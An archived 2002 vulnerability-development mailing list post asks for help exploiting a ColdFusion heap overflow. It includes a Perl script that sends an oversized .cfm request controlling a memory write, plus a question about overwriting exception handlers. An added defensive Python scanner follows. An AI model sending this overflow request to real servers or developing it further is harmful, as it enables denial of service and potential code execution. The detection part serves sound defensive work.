Vulnerability Development mailing list archives

ColdFusion Heap Overflow


From: "Gary O'leary-Steele" <garyo () sec-1 com>
Date: Thu, 14 Nov 2002 11:31:10 -0000

Hi all,


I need some help with a subject I have been trying to get my head round for some
time. I am attempting to write exploit code for the recent ColdFusion heap
overflow discovered by eEye. I don't fully understand heap overflows but
here is where I'm at.

I can control the following values within the following instruction:

mov [ecx], eax


where ecx and eax can be any value I specify. Thinking back to the .asp
chunked transfer overflow, many people talked about and implemented exploits
which overwrite the structured exception handler to gain EIP. Because my
area is stack overflows, I started by trying to overwrite the saved RET by
specifying its location in [ecx] and the required value in eax. However,
this just caused the program to crash in a different place, and the value
in EBP was nowhere near where it was at the mov [ecx], eax instruction.

I am looking for the following:

How is the exception handler overwritten? Is it in a static place, etc.?

Papers or advice on exploiting this type of vulnerability.

Or any ideas using what I already have.

The following is the code I am currently using to overwrite the values in
ecx and eax (ecx = 0x42424242, eax = 0x41414141):



#Coldfusion HEAP overflow
use strict;
use warnings;
use Socket;

if (@ARGV < 1) { die "\nCold Fusion Heap Overflow.\n Usage = IP/host:Port e.g. perl $0 www.target.com\n"; }
# $ARGV[0] is the first argument; the original @ARGV[0] is an array slice, not a scalar
my ($host, $port) = split(/:/, $ARGV[0]);
my $target = inet_aton($host) or die "Cannot resolve $host\n";
$port = 80 unless $port;

###################
my $len1 = "A" x 1000;
my $len2 = "B" x 1000;
my $len3 = "C" x 1000;
my $len4 = "D" x 1000;
###################

my $len5 = "E" x 119;
# "BBBB" ends up in ecx (0x42424242) and "AAAA" in eax (0x41414141) at the mov [ecx], eax
$len5 = $len5 . "BBBB" . "AAAA" . "e" x 175 . "n" x 175;
my $len6 = "X" x 500;

my $len = $len1 . $len2 . $len3 . $len4 . $len5 . $len6;
my $getreq = 'GET /' . $len . '.cfm' . ' HTTP/1.0';

# each header is one line terminated by CRLF (the archive had wrapped the long ones)
my $padrequest =
 $getreq .
 "\r\n" .
 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*' .
 "\r\n" .
 'Accept-Language: en-gb' .
 "\r\n" .
 'Accept-Encoding: gzip, deflate' .
 "\r\n" .
 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.1.4322)' .
 "\r\n" .
 'Host: ' . $host .
 "\r\n" .
 'Connection: Keep-Alive' .
 "\r\n\r\n";

my @result = sendraw($padrequest);
print $padrequest;
print length($padrequest), "\n";
#print @result;

sub sendraw {   # this saves the whole transaction anyway
 my ($pstr) = @_;
 socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
  die("Socket problems\n");
 # sockaddr_in builds the address structure portably (the original hand-packed it with pack "SnA4x8")
 if (connect(S, sockaddr_in($port, $target))) {
  my @in;
  select(S);      $| = 1;   print $pstr;
  while (<S>) { push @in, $_; }
  select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }
}


Thanks in advance.

Kind Regards
Gary
Sec-1
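Seen from the defender's side, the request the script above sends has two obvious signatures in a web server access log: a URI several kilobytes long, and a path made almost entirely of long runs of a single byte. The following Python is an added example (not Gary's code and not part of the thread) that scans Common Log Format lines for those two properties; the sample log lines, the 1 KB and 200-byte thresholds, and the `Finding` field names are constructed assumptions, not values from the post.

```python
import re
from collections import namedtuple

# Constructed sample of Common Log Format lines (not real traffic). The third
# line reproduces the shape of the request in the post: a GET for a path built
# from 1000-byte runs of one character, ending in .cfm, over HTTP/1.0.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Nov/2002:11:31:10 +0000] "GET /index.cfm HTTP/1.0" 200 5120',
    '10.0.0.7 - - [14/Nov/2002:11:31:12 +0000] "GET /images/logo.gif HTTP/1.1" 200 2048',
    '10.0.0.9 - - [14/Nov/2002:11:31:15 +0000] "GET /' + "A" * 1000 + "B" * 1000
        + "C" * 1000 + "D" * 1000 + "E" * 119 + "BBBBAAAA" + "e" * 175 + "n" * 175
        + "X" * 500 + '.cfm HTTP/1.0" 500 0',
    '10.0.0.5 - - [14/Nov/2002:11:31:20 +0000] "POST /login.cfm HTTP/1.1" 302 0',
]

# Common Log Format: host ident authuser [date] "method uri proto" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Assumed thresholds (tune per site): legitimate URIs are rarely over 1 KB, and a
# run of 200 or more identical bytes is characteristic of overflow padding.
MAX_URI_LEN = 1024
MAX_RUN_LEN = 200

Finding = namedtuple("Finding", "ip uri_len longest_run extension reasons")


def longest_run(s):
    """Length of the longest run of one repeated character in s (0 for empty)."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def analyse_request(line, max_uri_len=MAX_URI_LEN, max_run_len=MAX_RUN_LEN):
    """Return a Finding for a suspicious request line, or None if it looks normal."""
    m = CLF_RE.match(line)
    if not m:
        return None  # not CLF; a real pipeline would count these separately
    uri = m.group("uri")
    path = uri.split("?", 1)[0]
    last_segment = path.rsplit("/", 1)[-1]
    ext = last_segment.rsplit(".", 1)[-1].lower() if "." in last_segment else ""
    run = longest_run(path)
    reasons = []
    if len(uri) > max_uri_len:
        reasons.append("uri_length")
    if run >= max_run_len:
        reasons.append("repeated_padding")
    if not reasons:
        return None
    return Finding(m.group("ip"), len(uri), run, ext, tuple(reasons))


def scan(lines):
    """Run analyse_request over every line and keep only the findings."""
    return [f for f in (analyse_request(ln) for ln in lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip}: uri_len={f.uri_len} longest_run={f.longest_run} "
              f"ext={f.extension} reasons={','.join(f.reasons)}")
```

The extension is reported alongside the length and run measurements so that hits against a particular handler (here `.cfm`) can be correlated with the server-side crash the post describes; on its own, URI length is a noisy signal, which is why both conditions are recorded separately in `reasons` rather than collapsed into one score.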

